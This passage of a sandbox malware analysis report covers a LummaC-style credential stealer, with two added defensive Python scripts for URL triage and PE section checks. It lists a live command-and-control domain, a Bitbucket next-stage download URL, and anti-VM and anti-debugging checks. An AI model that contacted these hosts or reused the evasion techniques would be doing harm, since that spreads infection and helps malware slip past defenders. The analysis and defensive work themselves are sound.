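The URL rows above mix observables of very different value: CA/OCSP/CRL URLs that any signed binary or TLS client carries, browser default search-engine and Firefox new-tab URLs that typically land in the process's memory when browser profile files are parsed, the Bitbucket and S3 location of the next-stage download, and one domain that matches none of those patterns. The Python below is an added example written for this page, not Joe Sandbox output. It carves URLs out of the 'String found in binary or memory' rows (including URLs glued together in memory and certificate URLs with an ASN.1 length byte stuck to the TLD), buckets the hosts, and summarises the TLS rows per remote endpoint. The sample rows are copied from this report with the source column abridged; the allow-list of benign suffixes and the 'c2_candidate' label are the author's working assumptions for this report, not something the sandbox asserts.

```python
"""Triage of the URL and network rows of a sandbox report.

Added example, not part of the Joe Sandbox output: pulls every URL out of
'String found in binary or memory' rows, groups the hosts into payload staging,
benign context and unclassified (C2 candidate) buckets using an allow-list the
author wrote for this report, and summarises TLS connections per remote endpoint."""
import re
from collections import defaultdict

# Rows copied from this report; the source column is abridged to one memory dump.
SAMPLE_ROWS = """\
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat/api
Source: Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://observerfry.lat:443/api
Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.10:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.18.140:443 -> 192.168.2.10:49764 version: TLS 1.2
"""

URL_RE = re.compile(r"https?://(?:(?!https?://)\S)+")  # stops where a second URL starts
HOST_RE = re.compile(r"^https?://([^/?#:\s]+)", re.I)
TLS_RE = re.compile(r"HTTPS traffic detected: (\d+\.\d+\.\d+\.\d+):(\d+) -> "
                    r"(\d+\.\d+\.\d+\.\d+):(\d+) version: (TLS [\d.]+)")

# Author's allow-list for this report (an assumption, not sandbox output).
STAGING_SUFFIXES = ("bitbucket.org", "amazonaws.com")  # where the next stage is fetched from
BENIGN_SUFFIXES = (
    "globalsign.com", "amazontrust.com", "lencr.org",  # OCSP/CRL/CA URLs embedded in certificates
    "duckduckgo.com", "ecosia.org", "yahoo.com", "google.com",  # browser default search engines
    "mozilla.org", "mozilla.com", "admarketplace.net", "ap01.net", "mt48.net",  # Firefox new-tab content
    "amazon.com", "marriott.com", "atlassian.com", "atl-paas.net", "cookielaw.org", "cloudfront.net",
)


def host_of(url):
    """Hostname of a URL carved from memory. Certificate URLs often carry an ASN.1
    length byte glued to the TLD (…amazontrust.com0:), so trailing digits after an
    alphabetic TLD are dropped."""
    m = HOST_RE.match(url)
    if not m:
        return None
    return re.sub(r"(\.[a-z]{2,})\d+$", r"\1", m.group(1).lower())


def _under(host, suffix):
    return host == suffix or host.endswith("." + suffix)


def classify_host(host):
    if any(_under(host, s) for s in STAGING_SUFFIXES):
        return "staging"
    if any(_under(host, s) for s in BENIGN_SUFFIXES):
        return "benign_context"
    return "c2_candidate"  # unknown host: confirm against the extracted configuration


def extract_urls(rows):
    urls = set()
    for line in rows.splitlines():
        if "String found in binary or memory:" in line:
            urls.update(URL_RE.findall(line.split("String found in binary or memory:", 1)[1]))
    return urls


def triage_hosts(rows):
    buckets = defaultdict(set)
    for url in extract_urls(rows):
        host = host_of(url)
        if host:
            buckets[classify_host(host)].add(host)
    return dict(buckets)


def tls_by_remote(rows):
    """Local ports per remote endpoint; the report prints the server side first."""
    remotes = defaultdict(list)
    for remote_ip, remote_port, _local_ip, local_port, version in TLS_RE.findall(rows):
        remotes[f"{remote_ip}:{remote_port}"].append((int(local_port), version))
    return {k: sorted(v) for k, v in remotes.items()}


if __name__ == "__main__":
    for bucket, hosts in sorted(triage_hosts(SAMPLE_ROWS).items()):
        print(f"{bucket:15} {', '.join(sorted(hosts))}")
    for remote, conns in tls_by_remote(SAMPLE_ROWS).items():
        print(f"{remote:20} {len(conns)} TLS sessions, local ports {[p for p, _ in conns]}")
```

Run against the full row set of this report, the 'c2_candidate' bucket contains only observerfry.lat, the 'staging' bucket bitbucket.org and bbuseruploads.s3.amazonaws.com, and eight of the ten TLS sessions go to 104.21.36.201:443. The remote-IP grouping is a pointer for further work, not an attribution: the report does not state which hostname each IP served, so pair it with the DNS rows before writing a block rule.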

                System Summary

                barindex
Source: Yh6fS6qfTE.exe | Static PE information: section name: [consists of special or non-printable characters and is not rendered; this is the section the "PE file contains section with special chars" signature refers to]
Source: Yh6fS6qfTE.exe | Static PE information: section name: .rsrc
Source: Yh6fS6qfTE.exe | Static PE information: section name: .idata
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Code function: 0_3_014587AF (reported 49 times)
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Code function: 0_3_0145A372 (reported 49 times)
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Code function: String function: 01459226 appears 49 times
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1928 (Windows Error Reporting for PID 7200, i.e. the sample itself raised an unhandled exception during the run)
Source: Yh6fS6qfTE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Yh6fS6qfTE.exe | Static PE information: Section: ZLIB complexity 0.9973713077910958
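The 'Static PE information' rows above (a section name that does not render, EXECUTABLE_IMAGE/32BIT_MACHINE, a section with ZLIB complexity 0.997) are header facts that can be checked without running the sample. The Python below is an added example written for this page, not Joe Sandbox code. It parses the section table of a PE image with the standard library only and flags non-printable section names, writable-and-executable sections, near-incompressible sections (Shannon entropy is used here as a stand-in for Joe's ZLIB ratio) and an entry point that does not fall inside a standard code section. The PE image it analyses is constructed in memory from made-up section data that mirrors this report's layout; it is not the analysed file.

```python
"""Static PE section triage with the standard library only.

Added example, not sandbox output: parses the section table of a PE32/PE32+ image
and raises the flags this report shows for the sample (non-printable section name,
near-incompressible section content, entry point outside a standard code section).
The sample image is constructed in memory and is not the analysed file."""
import hashlib
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code", ".itext"}
PACKED_ENTROPY = 7.2  # bits/byte; compiled x86 code is usually ~6, compressed or encrypted data >7.5


def shannon_entropy(data):
    """Bits of entropy per byte, 0.0 to 8.0 (Joe's 'ZLIB complexity' measures the same property as a ratio)."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image):
    """Return (AddressOfEntryPoint, list of section dicts) for a PE image held in memory."""
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[:2] != b"MZ" or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections, = struct.unpack_from("<H", image, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", image, e_lfanew + 20)
    opt = e_lfanew + 24
    entry_rva, = struct.unpack_from("<I", image, opt + 16)  # same offset in PE32 and PE32+
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, opt + opt_size + 40 * i)
        text = name.rstrip(b"\0")
        sections.append({
            "name": text.decode("latin-1"),
            "name_printable": bool(text) and all(0x21 <= c <= 0x7E for c in text),
            "virtual_address": vaddr, "virtual_size": vsize, "raw_size": rawsize,
            "characteristics": chars, "entropy": shannon_entropy(image[rawptr:rawptr + rawsize]),
        })
    return entry_rva, sections


def analyze_pe(image):
    entry_rva, sections = parse_sections(image)
    findings, entry_in = [], None
    for s in sections:
        label = s["name"] if s["name_printable"] else f"unnamed {s['name'].encode('latin-1')!r}"
        if not s["name_printable"]:
            findings.append(f"section {label}: name is empty or contains non-printable characters")
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {label}: writable and executable")
        if s["entropy"] >= PACKED_ENTROPY:
            findings.append(f"section {label}: entropy {s['entropy']:.2f} bits/byte, likely packed or encrypted")
        if s["virtual_address"] <= entry_rva < s["virtual_address"] + max(s["virtual_size"], s["raw_size"]):
            entry_in = (s["name"], label)
    if entry_in is None:
        findings.append(f"entry point 0x{entry_rva:X} lies outside every section")
    elif entry_in[0] not in STANDARD_CODE_SECTIONS:
        findings.append(f"entry point 0x{entry_rva:X} lies outside standard code sections (in {entry_in[1]})")
    return {"entry_point": entry_rva, "sections": sections, "findings": findings}


def build_pe32(sections, file_align=0x200, sect_align=0x1000):
    """Assemble a minimal, non-runnable PE32 image from (name, data, characteristics) tuples;
    the entry point is placed one byte into the first section. Constructed test input only."""
    align = lambda v, a: (v + a - 1) // a * a
    headers_size = align(0x40 + 4 + 20 + 0xE0 + 40 * len(sections), file_align)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)  # i386, EXECUTABLE_IMAGE|32BIT_MACHINE
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 16, sect_align + 1)  # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, sect_align, file_align)  # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, sect_align * (len(sections) + 1), headers_size)  # SizeOfImage, SizeOfHeaders
    table, body, rawptr = bytearray(), bytearray(), headers_size
    for i, (name, data, chars) in enumerate(sections):
        rawsize = align(len(data), file_align)
        table += struct.pack("<8sIIIIIIHHI", name[:8].ljust(8, b"\0"), len(data),
                             sect_align * (i + 1), rawsize, rawptr, 0, 0, 0, 0, chars)
        body += data.ljust(rawsize, b"\0")
        rawptr += rawsize
    return bytes((dos + b"PE\0\0" + coff + opt + table).ljust(headers_size, b"\0") + body)


# Constructed sample mirroring this report's layout: a code section whose name is non-printable
# bytes and whose content is near-random (deterministic SHA-256 chain), then .rsrc and .idata.
HIGH_ENTROPY_BLOB = b"".join(hashlib.sha256(i.to_bytes(2, "little")).digest() for i in range(64))
SAMPLE_SECTIONS = [
    (b"\x01\x8f\xe2\x03\x7f", HIGH_ENTROPY_BLOB, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".rsrc", b"\0" * 300, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".idata", b"kernel32.dll\0LoadLibraryA\0GetProcAddress\0",
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]

if __name__ == "__main__":
    report = analyze_pe(build_pe32(SAMPLE_SECTIONS))
    for s in report["sections"]:
        print(f"{s['name']!r:28} rva=0x{s['virtual_address']:X} entropy={s['entropy']:.2f}")
    for finding in report["findings"]:
        print("FLAG:", finding)
```

To use it on a real file, pass `open(path, "rb").read()` to `analyze_pe` instead of the constructed image. The entropy threshold is a heuristic: resource sections holding compressed images or embedded archives also score above 7, so a high-entropy flag on a section that also happens to hold the entry point, as it does here, is the combination worth acting on.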
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7200
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\125fe084-288f-4be6-a2bd-1543967291b5
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policy key that Windows process-creation code reads on its own when a child process is started; not a check the sample performs deliberately)
Source: Yh6fS6qfTE.exe, 00000000.00000003.1353167524.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1353018244.0000000005AD9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); (schema of the password_notes table in Chromium's Login Data credential database, consistent with the browser-credential theft signatures above)
Source: Yh6fS6qfTE.exe | ReversingLabs: Detection: 60%
Source: Yh6fS6qfTE.exe | Virustotal: Detection: 56%
Source: Yh6fS6qfTE.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Yh6fS6qfTE.exe | String found in binary or memory: DRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeU (ThunRTMain, __vbaVarTstNe and the "Cannot find" message are Visual Basic 6 runtime (MSVBVM60) artefacts: the outer file is a VB6-compiled stub around the LummaC payload)
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File read: C:\Users\user\Desktop\Yh6fS6qfTE.exe
Source: unknown | Process created: C:\Users\user\Desktop\Yh6fS6qfTE.exe "C:\Users\user\Desktop\Yh6fS6qfTE.exe"
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1928
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Section loaded: version.dll
                Source: Yh6fS6qfTE.exe | Static file information: File size 2968064 > 1048576
                Source: Yh6fS6qfTE.exe | Static PE information: Raw size of atqsxypq is bigger than: 0x100000 < 0x2ac800

                Data Obfuscation

                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Unpacked PE file: 0.2.Yh6fS6qfTE.exe.f20000.0.unpack :EW;.rsrc :W;.idata :W;atqsxypq:EW;qsfumtfj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;atqsxypq:EW;qsfumtfj:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: Yh6fS6qfTE.exe | Static PE information: real checksum: 0x2dab09 should be: 0x2ddd39
                Source: Yh6fS6qfTE.exe | Static PE information: section name:
                Source: Yh6fS6qfTE.exe | Static PE information: section name: .rsrc
                Source: Yh6fS6qfTE.exe | Static PE information: section name: .idata
                Source: Yh6fS6qfTE.exe | Static PE information: section name: atqsxypq
                Source: Yh6fS6qfTE.exe | Static PE information: section name: qsfumtfj
                Source: Yh6fS6qfTE.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Code function: 0_3_0145A694 push esi; retf 0_3_0145A697
                Source: Yh6fS6qfTE.exe | Static PE information: section name: entropy: 7.987571678988286

                Boot Survival

                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F77DA second address: 10F77E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F77E0 second address: 10F77FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FD09CB0C7E6h 0x0000000e jmp 00007FD09CB0C7EDh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F66B0 second address: 10F66B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F6820 second address: 10F6824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F6824 second address: 10F6828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F69D8 second address: 10F69F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD09CB0C7F7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F69F8 second address: 10F69FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F69FC second address: 10F6A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F6A00 second address: 10F6A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F6A0C second address: 10F6A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FD09CB0C7E6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10F9F3E second address: 10F9F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA065 second address: 10FA09D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD09CB0C7F8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA09D second address: 10FA0BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA0BE second address: 10FA0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EAh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA0CD second address: 10FA0FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151B8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f jc 00007FD09CF151BCh 0x00000015 jp 00007FD09CF151B6h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD09CF151BBh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA0FA second address: 10FA100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA100 second address: 10FA104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA104 second address: 10FA11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 lea ebx, dword ptr [ebp+12455E22h] 0x0000000f clc 0x00000010 push eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA11A second address: 10FA11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA11E second address: 10FA122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA162 second address: 10FA1E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FD09CF151C7h 0x00000010 jmp 00007FD09CF151C1h 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 jmp 00007FD09CF151BAh 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D35ECh], edx 0x00000026 push 4D6EDB1Fh 0x0000002b jmp 00007FD09CF151C2h 0x00000030 xor dword ptr [esp], 4D6EDB9Fh 0x00000037 mov edx, dword ptr [ebp+122D2CDDh] 0x0000003d push 00000003h 0x0000003f mov edx, dword ptr [ebp+122D3C24h] 0x00000045 push 00000000h 0x00000047 mov dword ptr [ebp+122D378Ch], ecx 0x0000004d add edx, dword ptr [ebp+122D2DF1h] 0x00000053 push 00000003h 0x00000055 mov si, 072Ah 0x00000059 push 49F5DD85h 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 pop edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA1E3 second address: 10FA1EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 10FA1EC second address: 10FA1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
